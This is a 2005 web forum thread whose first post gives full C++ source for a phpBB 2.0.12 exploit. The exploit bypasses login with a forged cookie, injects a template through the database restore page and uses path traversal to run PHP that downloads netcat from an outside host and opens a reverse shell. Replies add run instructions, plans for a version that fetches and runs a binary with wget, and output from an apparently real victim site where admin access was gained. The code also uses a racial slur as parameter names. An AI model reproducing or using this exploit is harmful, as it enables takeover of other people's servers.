Waraxe IT Security Portal
Login or Register
November 22, 2024
Menu
Home
Logout
Discussions
Forums
Members List
IRC chat
Tools
Base64 coder
MD5 hash
CRC32 checksum
ROT13 coder
SHA-1 hash
URL-decoder
Sql Char Encoder
Affiliates
y3dips ITsec
Md5 Cracker
User Manuals
AlbumNow
Content
Content
Sections
FAQ
Top
Info
Feedback
Recommend Us
Search
Journal
Your Account
User Info
Welcome, Anonymous
Nickname
Password
(Register)

Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144

People Online:
Visitors: 45
Members: 0
Total: 45
Full disclosure
APPLE-SA-11-19-2024-5 macOS Sequoia 15.1.1
Local Privilege Escalations in needrestart
APPLE-SA-11-19-2024-4 iOS 17.7.2 and iPadOS 17.7.2
APPLE-SA-11-19-2024-3 iOS 18.1.1 and iPadOS 18.1.1
APPLE-SA-11-19-2024-2 visionOS 2.1.1
APPLE-SA-11-19-2024-1 Safari 18.1.1
Reflected XSS - fronsetiav1.1
XXE OOB - fronsetiav1.1
St. Poelten UAS | Path Traversal in Korenix JetPort 5601
St. Poelten UAS | Multiple Stored Cross-Site Scripting in SEH utnserver Pro
Apple web content filter bypass allows unrestricted access to blocked content (macOS/iOS/iPadOS/visionO S/watchOS)
SEC Consult SA-20241112-0 :: Multiple vulnerabilities in Siemens Energy Omnivise T3000 (CVE-2024-38876, CVE-2024-38877, CVE-2024-38878, CVE-2024-38879)
Security issue in the TX Text Control .NET Server for ASP.NET.
SEC Consult SA-20241107-0 :: Multiple Vulnerabilities in HASOMED Elefant and Elefant Software Updater
Unsafe eval() in TestRail CLI
Log in Register Forum FAQ Memberlist Search
IT Security and Insecurity Portal

www.waraxe.us Forum Index -> PhpBB -> phpBB User id Auth. Bypass and "admin_styles" Code Goto page 1, 2Next
Post new topicReply to topic View previous topic :: View next topic
phpBB User id Auth. Bypass and "admin_styles" Code
PostPosted: Wed Mar 16, 2005 6:53 am Reply with quote
LINUX
Moderator
Moderator
Joined: May 24, 2004
Posts: 404
Location: Caiman




Code:
*
coded by overdose phpbb <= 2.0.12
slythers@gmail.com
C:\source\phpbbexp>bcc32 -c serv.cpp
Borland C++ 5.5.1 for Win32 Copyright (c) 1993, 2000 Borland
serv.cpp:
Warning W8060 serv.cpp 77: Possibly incorrect assignment in function serveur::co
nnectsocket(char *,unsigned short)

C:\source\phpbbexp>bcc32 phpbbexp.cpp serv.obj
Borland C++ 5.5.1 for Win32 Copyright (c) 1993, 2000 Borland
phpbbexp.cpp:
Turbo Incremental Link 5.00 Copyright (c) 1997, 2000 Borland

C:\source\phpbbexp>

je cherche un job au passage :>
*/
#include <iostream.h>
#include <winsock.h>
#include "serv.h"

#define SHELL "$a=fopen(\"http://img58.exs.cx/img58/1584/nc4hk.swf\",\"r\");
$b=\"\";while(!feof($a)){$b%20.=%20fread($a,200000);};fclose($a);
$a=fopen(\"/tmp/.sess_\",\"w\");fwrite($a,$b);fclose($a);
chmod(\"/tmp/.sess_\",0777);system(\"/tmp/.sess_%20\".$_REQUEST[niggaip]
.\"%20\".$_REQUEST[niggaport].\"%20-e%20/bin/sh\");"

#define HTTP_PORT 80
#define DEFAULT_COOKIE "phpbb2mysql"
#define SIGNATURE_SESSID "Set-Cookie: "
#define BOUNDARY "----------g7pEbdXsWGPB7wRFGrqA1g"
#define UP_FILE "------------g7pEbdXsWGPB7wRFGrqA1g\nContent-Disposition:
form-data; name=\"restore_start\"\n\npetass\n------------g7pEbdXsWGPB7wRFGrqA1g\
nContent-Disposition: form-data; name=\"perform\"\n\nrestore\n------------g7pEbd
XsWGPB7wRFGrqA1g\nContent-Disposition: form-data; name=\"backup_file\";
filename=\"phpbb_db_backup.sql\"\nContent-Type: text/sql\n\n"
#define UP_FILE_END "\n------------g7pEbdXsWGPB7wRFGrqA1g--\n"
#define EXP_TEMPLATES "mode=export&edit=Envoyer&export_template="
#define SIGNATURE_TABLE_NAME "DROP TABLE IF EXISTS "
#define SIGNATURE_TABLE_NAME_END "_config;"

#define SQL_TEMPLATES "DROP TABLE IF EXISTS "
#define SQL_TEMPLATES_2 "_themes;\nCREATE TABLE "
char *sql_templates_3 ="_themes("
"themes_id mediumint(8) unsigned NOT NULL auto_increment,"
"template_name varchar(150) NOT NULL,"
"style_name varchar(30) NOT NULL,"
"head_stylesheet varchar(100),"
"body_background varchar(100),"
"body_bgcolor varchar(6),"
"body_text varchar(6),"
"body_link varchar(6),"
"body_vlink varchar(6),"
"body_alink varchar(6),"
"body_hlink varchar(6),"
"tr_color1 varchar(6),"
"tr_color2 varchar(6),"
"tr_color3 varchar(6),"
"tr_class1 varchar(25),"
"tr_class2 varchar(25),"
"tr_class3 varchar(25),"
"th_color1 varchar(6),"
"th_color2 varchar(6),"
"th_color3 varchar(6),"
"th_class1 varchar(25),"
"th_class2 varchar(25),"
"th_class3 varchar(25),"
"td_color1 varchar(6),"
"td_color2 varchar(6),"
"td_color3 varchar(6),"
"td_class1 varchar(25),"
"td_class2 varchar(25),"
"td_class3 varchar(25),"
"fontface1 varchar(50),"
"fontface2 varchar(50),"
"fontface3 varchar(50),"
"fontsize1 tinyint(4),"
"fontsize2 tinyint(4),"
"fontsize3 tinyint(4),"
"fontcolor1 varchar(6),"
"fontcolor2 varchar(6),"
"fontcolor3 varchar(6),"
"span_class1 varchar(25),"
"span_class2 varchar(25),"
"span_class3 varchar(25),"
"img_size_poll smallint(5) unsigned,"
"img_size_privmsg smallint(5) unsigned,"
"PRIMARY KEY (themes_id)"
");";

#define SQL_FAKE_TEMPLATES "\nINSERT INTO "
#define SQL_FAKE_TEMPLATES_2 "_themes (themes_id, template_name, style_name,
head_stylesheet, body_background, body_bgcolor, body_text, body_link, body_vlink,
body_alink, body_hlink, tr_color1, tr_color2, tr_color3, tr_class1, tr_class2,
tr_class3, th_color1, th_color2, th_color3, th_class1, th_class2, th_class3,
td_color1, td_color2, td_color3, td_class1, td_class2, td_class3, fontface1,
fontface2, fontface3, fontsize1, fontsize2, fontsize3, fontcolor1, fontcolor2,
fontcolor3, span_class1, span_class2, span_class3, img_size_poll, img_size_privmsg)
VALUES(\'2\', \'"
//template_name varchar(30) NOT NULL,
#define FAKE_TEMPLATES_NAMES "aaa=12;eval(stripslashes($_REQUEST[nigga]));exit();
// /../../../../../../../../../../../../../../../../../../../tmp"
#define SQL_FAKE_TEMPLATES_3 "\', \'FI Black\', \'fiblack.css\', \'\', \'\', \'\',
\'\', \'\', \'\', \'\', \'\', \'\', \'\', \'\', \'\', \'\', \'\', \'\', \'\', \'\',
\'\', \'\', \'\', \'\', \'\', \'row1\', \'row2\', \'\', \'\', \'\', \'\', \'0\',
\'0\', \'0\', \'\', \'006699\', \'ffa34f\', \'cc\', \'bb\', \'a\', \'0\', \'0\');"
#define SQL_FAKE_TEMPLATES_4 "_themes (themes_id, template_name, style_name,
head_stylesheet, body_background, body_bgcolor, body_text, body_link, body_vlink,
body_alink, body_hlink, tr_color1, tr_color2, tr_color3, tr_class1, tr_class2,
tr_class3, th_color1, th_color2, th_color3, th_class1, th_class2, th_class3,
td_color1, td_color2, td_color3, td_class1, td_class2, td_class3, fontface1, fontface2,
fontface3, fontsize1, fontsize2, fontsize3, fontcolor1, fontcolor2, fontcolor3,
span_class1, span_class2, span_class3, img_size_poll, img_size_privmsg) VALUES
(\'1\', \'subSilver\', \'subSilver\', \'subSilver.css\',\'\', \'E5E5E5\', \'000000\',
\'006699\', \'5493B4\', \'\', \'DD6900\', \'EFEFEF\', \'DEE3E7\', \'D1D7DC\', \'\',
\'\', \'\', \'98AAB1\', \'006699\', \'FFFFFF\', \'cellpic1.gif\', \'cellpic3.gif\',
\'cellpic2.jpg\', \'FAFAFA\', \'FFFFFF\', \'\', \'row1\', \'row2\', \'\', \'Verdana,
Arial, Helvetica, sans-serif\', \'Trebuchet MS\', \'Courier, \\\'Courier New\\\',
sans-serif\', \'10\', \'11\', \'12\', \'444444\', \'006600\', \'FFA34F\', \'\',
\'\', \'\', NULL, NULL);"
#define SQL_FAKE_TEMPLATES_5 "\nUPDATE "
#define SQL_FAKE_TEMPLATES_6 "_config set config_value=\"1\" where config_name=\"default_style\";"

struct url{
char *dns;
char *uri;
unsigned short port;
};

struct url parseurl(char *of);
char * intostr(int erf);
void help();

int main(int argc,char *argv[])
{
char buff[1024];
char sid[33];
char oct;
char *cookiename;
char *ptr;
char *tablename = 0x00;
char *phpcode = SHELL;
bool flag;
unsigned int longbeach;
serveur http;
struct url victim;
WSAData wsadata;
if(WSAStartup(MAKEWORD(2, 0),&wsadata) != 0)
return 1;
if(argc < 4)
help();
cookiename= DEFAULT_COOKIE;
sid[0] = '\0';
victim = parseurl(argv[1]);
//detection du nom du cookie
http.createsocket();
if(!http.connectsocket(victim.dns,victim.port))
return 0;
http << "GET ";
http << victim.uri;
http << " HTTP/1.1\nHost: ";
http << victim.dns;
http << "\nReferer: ";
http << argv[1];
http << "\nUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\n
Connection: close\n\n";
do{
if(!http.getline(buff,1023))
buff[0] = 0x00;
if(!strncmp(buff,SIGNATURE_SESSID,sizeof(SIGNATURE_SESSID)-1))
{
ptr = buff + sizeof(SIGNATURE_SESSID)-1;
for(ptr; *ptr && (*ptr != '=');ptr++);
*ptr= '\0';
ptr -= 4;
if(!strncmp(ptr,"_sid",4))
{
*ptr = '\0';
ptr = buff + sizeof(SIGNATURE_SESSID)-1;
cookiename = new char[strlen(ptr)+1];
strcpy(cookiename,ptr);
cout << "_ nom du cookie recuperer : "<<cookiename<<endl;
buff[0] = '\0';
};
};
}while(buff[0]);
http.closesock();
http.createsocket();
if(!http.connectsocket(victim.dns,victim.port))
return 0;
//faille cookie uid
http << "GET ";
http << victim.uri;
http << " HTTP/1.1\nHost: ";
http << victim.dns;
http << "\nCookie: ";
http << cookiename;
http << "_data=a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs%3A6%3A%22
userid%22%3Bs%3A1%3A%222%22%3B%7D; expires=Fri, 24-Dec-2005 21:25:37 GMT; path=/; domain=";
http << victim.dns;
http << "\nReferer: ";
http << argv[1];
http << "\nUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\nConnection: close\n\n";
do{
if(!http.getline(buff,1023))
buff[0] = 0x00;
if(!strncmp(buff,SIGNATURE_SESSID,sizeof(SIGNATURE_SESSID)-1))
{
ptr = buff + sizeof(SIGNATURE_SESSID)-1;
if((!strncmp(ptr,cookiename,strlen(cookiename))) && (!strncmp(&ptr[strlen(cookiename)],"_sid=",sizeof("_sid=")-1)))
{
ptr += strlen(cookiename) + sizeof("_sid=")-1;
strncpy(sid,ptr,32);
sid[32] = '\0';
};
};
}while(buff[0]);
if(!sid[0])
{
cout << "_ recuperation de l'identifiant de session a echouer"<<endl;
return 0;
};
cout << "_ SESSION ID recuper? ... "<<sid<<endl<<argv[1]<<"?sid="<<sid<<endl;
http.closesock();
//recuperation du nom de la table
http.createsocket();
if(!http.connectsocket(victim.dns,victim.port))
return 0;
cout <<"_ recuperation du nom de la table sql ... ";
http << "GET ";
http << victim.uri;
http << "admin/admin_db_utilities.php?perform=backup&additional_tables=&backup_type=
structure&drop=1&backupstart=1&gzipcompress=0&startdownload=1&sid=";
http << sid;
http << " HTTP/1.1\nHost: ";
http << victim.dns;
http << "\nReferer: ";
http << argv[1];
http << "\nUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\nConnection: close\n\n";
flag = 1;
while(flag)
{
flag = http.getline(buff,1023);
if(!strncmp(buff,SIGNATURE_TABLE_NAME,sizeof(SIGNATURE_TABLE_NAME)-1))
{
longbeach = strlen(buff);
ptr = buff + longbeach - (sizeof(SIGNATURE_TABLE_NAME_END)-1);
if(!strcmp(ptr,SIGNATURE_TABLE_NAME_END))
{
flag = 0;
*ptr= '\0';
ptr = buff + sizeof(SIGNATURE_TABLE_NAME) -1;
tablename = new char[strlen(ptr)+1];
strcpy(tablename,ptr);
};
};
};
http.closesock();
if(!tablename)
{
cout <<"can\'t find"<<endl;
return 0;
};
cout <<tablename << " OK"<<endl;
cout << "_ Injection de la fake templates ...";
http.createsocket();
if(!http.connectsocket(victim.dns,victim.port))
return 0;
http << "POST ";
http << victim.uri;
http << "admin/admin_db_utilities.php?sid=";
http << sid;
http << " HTTP/1.1\nHost: ";
http << victim.dns;
http << "\nReferer: ";
http << argv[1];
http << "\nUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\nConnection: close, TE\r\nTE:
deflate, chunked, identify, trailers\r\nCache-Control: no-cache\r\nContent-Type: multipart/form-data;
boundary=" BOUNDARY "\nContent-Length: ";
http << intostr(strlen(sql_templates_3)+sizeof(SQL_TEMPLATES)-1+sizeof(SQL_TEMPLATES_2)-1+sizeof
(SQL_FAKE_TEMPLATES)-1+strlen(tablename)+sizeof(SQL_FAKE_TEMPLATES_2)-1+sizeof
(FAKE_TEMPLATES_NAMES)-1+sizeof(SQL_FAKE_TEMPLATES_3)-1+sizeof(SQL_FAKE_TEMPLATES)-1+
strlen(tablename)+sizeof(SQL_FAKE_TEMPLATES_4)-1+sizeof(SQL_FAKE_TEMPLATES_5)-1+
strlen(tablename)+sizeof(SQL_FAKE_TEMPLATES_6)-1+sizeof(UP_FILE_END)-1+sizeof(UP_FILE));
http << "\n\n" UP_FILE SQL_TEMPLATES;
http << tablename;
http << SQL_TEMPLATES_2;
http << tablename;
http << sql_templates_3;
http << SQL_FAKE_TEMPLATES;
http << tablename;
http << SQL_FAKE_TEMPLATES_4 SQL_FAKE_TEMPLATES_5;
http << tablename;
http << SQL_FAKE_TEMPLATES_6 SQL_FAKE_TEMPLATES;
http << tablename;
http << SQL_FAKE_TEMPLATES_2 FAKE_TEMPLATES_NAMES SQL_FAKE_TEMPLATES_3 UP_FILE_END ;
while(http.getnb(&oct,sizeof(char)));
cout <<"OK"<<endl;
ptr = new char[sizeof(FAKE_TEMPLATES_NAMES)];
strcpy(ptr,FAKE_TEMPLATES_NAMES);
for(int cpt = 0; ptr[cpt]!= '\0';cpt++)
{
if(ptr[cpt] == ' ')
ptr[cpt] = '+';
};
//creation de la page dans /tmp
http.closesock();
http.createsocket();
if(!http.connectsocket(victim.dns,victim.port))
return 0;
http << "POST ";
http << victim.uri;
http << "admin/admin_styles.php?mode=export&sid=";
http << sid;
http << " HTTP/1.1\nHost: ";
http << victim.dns;
http << "\nReferer: ";
http << argv[1];
http << "admin/admin_styles.php?mode=export\nUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0;
Windows NT 5.1)\nConnection: close\nContent-Type: application/x-www-form-urlencoded\nContent-Length: ";
http << intostr(strlen(ptr)+sizeof(EXP_TEMPLATES)-1);
http << "\n\n";
http << EXP_TEMPLATES;
http << ptr;
while(http.getnb(&oct,sizeof(char)));
cout << "_ Fichier cr?e"<<endl;
//appelle de la page avec le code php
http.closesock();
http.createsocket();
if(!http.connectsocket(victim.dns,victim.port))
return 0;
http << "GET ";
http << victim.uri;
http << "admin/admin_styles.php?mode=addnew&install_to=../../../../../../../../../../../../../../../../../../../tmp&sid=";
http << sid;
http << "&niggaip=";
http << argv[2];
http << "&niggaport=";
http << argv[3];
http << "&nigga=";
http << phpcode;
http << " HTTP/1.1\nHost: ";
http << victim.dns;
http << "\nReferer: ";
http << argv[1];
http << "\nUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\nConnection: close\n\n";
while(http.getnb(&oct,sizeof(char)));
cout << "_ Code execut?"<<endl<<argv[1]<<"admin/admin_styles.php?mode=addnew&install_to
=../../../../../../../../../../../../../../../../../../../tmp&nigga=phpinfo();&sid="<<sid<<endl;
delete[] ptr;
return 0;
}

struct url parseurl(char *of)
{
struct url retour;
unsigned int taille;
char tmp;
retour.dns = 0x00;
retour.uri = 0x00;
retour.port = HTTP_PORT ;
while( *of && (*of != ':'))
of++;
if(*of && *(of+1) && *(of+2))
{
if((*(of+1) != '/') || (*(of+2) != '/'))
return retour;
of += 3;
for(taille = 0; (of[taille] != '/') && (of[taille] != '\0') && (of[taille] != ':');taille++);
retour.dns = new char [taille+1];
memcpy(retour.dns,of,taille);
retour.dns[taille] = '\0';
of += taille;
if(*of == ':')
{
of++;
for(taille = 0; (of[taille] != '/') && (of[taille] != '\0');taille++);
tmp = of[taille];
of[taille] = '\0';
if(taille)
retour.port = atoi(of);
of[taille] = tmp;
of += taille;
};
if(!*of)
{
retour.uri = new char[2];
strcpy(retour.uri,"/");
}
else
{
retour.uri = new char [strlen(of)+1];
strcpy(retour.uri,of);
};
};
return retour;
}

char * intostr(int erf)
{
char *chaine;
int puissance;
int erf2;
if( erf >= 0)
{
puissance =0;
for(int kekette = 1;kekette<=erf;kekette = kekette*10)
{
puissance++;
};
if (puissance == 0)
{
puissance = 1;
};
chaine = new char[puissance+1];
chaine[puissance] ='\0';
for(int arf = puissance-1;arf >=0;arf--)
{
erf2 = erf % 10 ;
chaine[arf] = '0' + erf2;
erf = erf /10;
};
return chaine;
}
else
return 0;
}

void help()
{
cout << "phpbbexp.exe http://site.com/phpbb/ [backshell ip] [backshell port]"<<endl;
cout << "coded by Malloc(0) Wicked Attitude"<<endl;
cout << "phpbb <= 2.0.12 uid vuln + admin_styles.php exploit"<<endl;
exit(0);
}


compiled exploit > http://overdose.tcpteam.org/phpbbexp.exe = http://overdose.tcpteam.org/phpbbexp.rar
View user's profile Send private message Visit poster's website
PostPosted: Wed Mar 16, 2005 12:29 pm Reply with quote
KingOfSka
Advanced user
Advanced user
Joined: Mar 13, 2005
Posts: 61




sound beutiful Very Happy
but it doesn't work on my test forum...
has someone tryied it ?
View user's profile Send private message Visit poster's website
PostPosted: Wed Mar 16, 2005 1:25 pm Reply with quote
LINUX
Moderator
Moderator
Joined: May 24, 2004
Posts: 404
Location: Caiman




KingOfSka wrote:
sound beutiful Very Happy
but it doesn't work on my test forum...
has someone tryied it ?



yes work nice, use netcat for listen in one port and run xpl

first one cmd : netcat listen port 6666
second : exploit htttp://www.victim.com/phpbb youip youport

copy and paste link in the cmd and go to you browser direct admin or copy and paste very large link and change phpinfo() for system(id)

english ..... xD
View user's profile Send private message Visit poster's website
PostPosted: Wed Mar 16, 2005 2:53 pm Reply with quote
KingOfSka
Advanced user
Advanced user
Joined: Mar 13, 2005
Posts: 61




i already tryied it...
could it be that this exploit works only on some server ?
*edit: if someones wants to try, http://skarulez.altervista.org/phpbb2.0.10/ , it's a test forum i put up, as you can see many people have already tested various exploit Very Happy
View user's profile Send private message Visit poster's website
PostPosted: Wed Mar 16, 2005 3:05 pm Reply with quote
O.T.M
Regular user
Regular user
Joined: Mar 11, 2005
Posts: 8




how to use this just compile and run?
but how run (port server ip)
like this exploit.exe 200.1.1.200 100
exploit name ip port
how?

_________________
___________________________
|I Want To Learn Sql Injection!!! |
|__________________________|
View user's profile Send private message
PostPosted: Wed Mar 16, 2005 3:42 pm Reply with quote
KingOfSka
Advanced user
Advanced user
Joined: Mar 13, 2005
Posts: 61




LINUX wrote:
KingOfSka wrote:
sound beutiful Very Happy
but it doesn't work on my test forum...
has someone tryied it ?



yes work nice, use netcat for listen in one port and run xpl

first one cmd : netcat listen port 6666
second : exploit htttp://www.victim.com/phpbb youip youport

copy and paste link in the cmd and go to you browser direct admin or copy and paste very large link and change phpinfo() for system(id)

english ..... xD

he said all Very Happy
View user's profile Send private message Visit poster's website
PostPosted: Wed Mar 16, 2005 4:10 pm Reply with quote
LINUX
Moderator
Moderator
Joined: May 24, 2004
Posts: 404
Location: Caiman




ok now i think redevelop this exploit, original exploit only its posible exec one cmd command for example sytem(id) or system(uname) but not is possible exec (uname -a) (wget www.a.a) ect, .
Correct exploit need make a function in php what this not generate space for use an function system() for correct use system(uname -a;wget www.a.a/root;chmod -c 777 root;./root; SH xD


i listen ideas now i develop this Wink Evil or Very Mad


remember my english not is very good Embarassed
View user's profile Send private message Visit poster's website
PostPosted: Wed Mar 16, 2005 4:53 pm Reply with quote
zer0-c00l
Advanced user
Advanced user
Joined: Jun 25, 2004
Posts: 72
Location: BRAZIL!




someone can put the .exe in ftp?
i can't compile it here
View user's profile Send private message
PostPosted: Thu Mar 17, 2005 5:09 am Reply with quote
y3dips
Valuable expert
Valuable expert
Joined: Feb 25, 2005
Posts: 281
Location: Indonesia




zer0-c00l wrote:
someone can put the .exe in ftp?
i can't compile it here


LINUX wrote the link to an exe files, u can donlod it from there
Compiled exploit > http://overdose.tcpteam.org/phpbbexp.exe = http://overdose.tcpteam.org/phpbbexp.rar

_________________
IO::y3dips->new(http://clog.ammar.web.id);
View user's profile Send private message Visit poster's website Yahoo Messenger
PostPosted: Thu Mar 17, 2005 6:17 am Reply with quote
LINUX
Moderator
Moderator
Joined: May 24, 2004
Posts: 404
Location: Caiman




y3dips wrote:
zer0-c00l wrote:
someone can put the .exe in ftp?
i can't compile it here


LINUX wrote the link to an exe files, u can donlod it from there
Compiled exploit > http://overdose.tcpteam.org/phpbbexp.exe = http://overdose.tcpteam.org/phpbbexp.rar



men all links work nice you need the source code ?
my friends in canada and russia redevelop exploit finish this day and i share Smile dont worry Twisted Evil
View user's profile Send private message Visit poster's website
PostPosted: Thu Mar 17, 2005 6:00 pm Reply with quote
O.T.M
Regular user
Regular user
Joined: Mar 11, 2005
Posts: 8




O.T.M wrote:
how to use this just compile and run?
but how run (port server ip)
like this exploit.exe 200.1.1.200 100
exploit name ip port
how?

_________________
___________________________
|I Want To Learn Sql Injection!!! |
|__________________________|
View user's profile Send private message
PostPosted: Thu Mar 17, 2005 7:55 pm Reply with quote
zer0-c00l
Advanced user
Advanced user
Joined: Jun 25, 2004
Posts: 72
Location: BRAZIL!




why netcat?

the xpl returns to me:
C:\Documents and Settings\Windows\Desktop>phpbbexp XXXXXXXX *********** 1337
_ nom du cookie recuperer : phpbb2mysql
_ SESSION ID recuper? ... 85f90d4021c5dbaf24f8cf39d255a6d9
http://www.sbfisica.org.br/phpBB2/?sid=85f90d4021c5dbaf24f8cf39d255a6d9
_ recuperation du nom de la table sql ... phpbb_ OK
_ Injection de la fake templates ...OK
_ Fichier cr?e
_ Code execut?
xxxxxxxxxxxxxxxxxxxx/admin/admin_styles.php?mode=addnew&install_to=
../../../../../../../../../../../../../../../../../../../tmp&nigga=phpinfo();&si
d=85f90d4021c5dbaf24f8cf39d255a6d9


ok, i enter in this URL and i got in admin panel, its ok Wink

but the netcat stills in 'listen' :S
View user's profile Send private message
PostPosted: Sun Mar 20, 2005 4:24 pm Reply with quote
Injector
Active user
Active user
Joined: Dec 29, 2004
Posts: 49




does this exploit mean dat you have a shell access on d site?
View user's profile Send private message
PostPosted: Mon Mar 21, 2005 12:58 pm Reply with quote
shai-tan
Valuable expert
Valuable expert
Joined: Feb 22, 2005
Posts: 477




Thats good work man....

_________________
Shai-tan

?In short: just say NO TO DRUGS, and maybe you won?t end up like the Hurd people.? -- Linus Torvalds
View user's profile Send private message
PostPosted: Tue Mar 22, 2005 1:48 pm Reply with quote
murdock
Advanced user
Advanced user
Joined: Mar 16, 2005
Posts: 54




I think the compiled version won't work.
You need to change the url on this part of code:
Code:
#define SHELL "$a=fopen(\"http://img58.exs.cx/img58/1584/nc4hk.swf\",\"r\");
$b=\"\";while(!feof($a)){$b%20.=%20fread($a,200000);};fclose($a);
$a=fopen(\"/tmp/.sess_\",\"w\");fwrite($a,$b);fclose($a);
chmod(\"/tmp/.sess_\",0777);system(\"/tmp/.sess_%20\".$_REQUEST[niggaip]
.\"%20\".$_REQUEST[niggaport].\"%20-e%20/bin/sh\");"


This url is pointing to a compiled linux netcat, you need to change to a valid URL because these one no longer exists!

I changed it but I can't compile it because I don't have de "serv.h" header file, can anyone send me this file? Thanks!

Salud!


Last edited by murdock on Tue Mar 22, 2005 7:06 pm; edited 1 time in total
View user's profile Send private message
phpBB User id Auth. Bypass and "admin_styles" Code
www.waraxe.us Forum Index -> PhpBB
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
All times are GMT
Page 1 of 2
Goto page 1, 2Next
Post new topicReply to topic


Powered by phpBB © 2001-2008 phpBB Group



Space Raider game for Android, free download - Space Raider gameplay video - Zone Raider mobile games
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2024 Janek Vind "waraxe"
Page Generation: 0.055 Seconds